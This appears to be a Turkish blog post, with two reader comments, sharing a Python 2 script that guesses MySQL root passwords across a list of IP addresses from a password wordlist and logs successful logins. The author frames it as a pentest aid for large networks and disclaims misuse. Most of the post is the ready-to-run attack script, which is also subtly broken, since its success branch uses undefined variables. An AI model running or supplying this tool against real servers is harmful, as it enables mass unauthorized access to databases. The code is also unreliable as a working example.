Python ile MySQL brute force

Bu yazımda python ile geliştirdiğim uygulamadan bahsedeğim.

Bazı testler de scan edilecek kuruma ait ip bloğu çok fazla olabiliyor, üniversiteler gibi..

Bu gibi durumlar da basic brute force testler gerçekleştiriliyor ve bu testler de farklı brute force tools ları kullanılıyor.

Hydra ve benzeri yazılımlara çok fazla ip adresi için brute force yapmasını istediğinizde kilitleniyor.

Bende bu durumda başımın çağresine bakmalıydım ve öyle de yaptım, oturdum python da kendim mysql brute force yapan bir tools yazdım, kodlar aşağıdaki şekilde.

Kodların kötüye kullanılmayacağını temenni ederek paylaşıyorum, kötüye kullanımıda sorumluluk kullanıcıya aittir.

Bu dosyayı bir dizine atın, aynı dizine ,

MySQL.log, MySQL.txt, password.txt text dosyalarını oluşturun, test edilecek ip adreslerini MySQL.txt ye password listenizi password.txt ye yerleştirin. python mysql.py şeklinde çalıştırın.

import MySQLdb
logfile=open(‘MySQL.log’, ‘w’)
ipaddress=open(“MySQL.txt”, ‘r’)
password = open(‘password.txt’, ‘r+’)
passlist=password.readlines()
iplist=ipaddress.readlines()

for x in iplist:
	passcount=0
	for y in passlist:
		passcount=passcount+1
		try:
			print “IP : %s” %x.rstrip()
			print “User : root”
			print “Password : %s” %y.rstrip()
			print “Denene sifre adeti : %s” %passcount
			db=MySQLdb.connect(host=x,user=’root’,passwd=y.rstrip())
			print “\t\nLogin successful:”,ip, user, passw
			logfile.write(x.rstrip())
			logfile.write(user)
			logfile.write(y.rstrip())
			db.close()
		except(MySQLdb.Error), msg:
			print “An error occurred:”, msg
			print “—————————”
			print “\n”
			pass
Share Button

  1. Dostum bu brute force olmamış ki; bu wordlist attack yöntemi. Brute force demek şifrelerin yazılımsal bir döngüyle üretilmesi tekniğiyle atak yapılmasıdır.

  2. Merhaba Mert,
    Aslına bakılırsa haklı olabilirsin farklı bir bakış açısı ancak söyle birşey var underground da veya security dünyasında wordlist ile yapılan ataklarda wordlist managment gibi bir kavram yok, en azından ben duymadım 🙂 bruteforce tools diye aradığında hydra ncrack gibi yazılımlar başı çekiyor ancak baktığında bu uygulamalar da wordlist ile deneme yapan uygulamalar.

Bir cevap yazın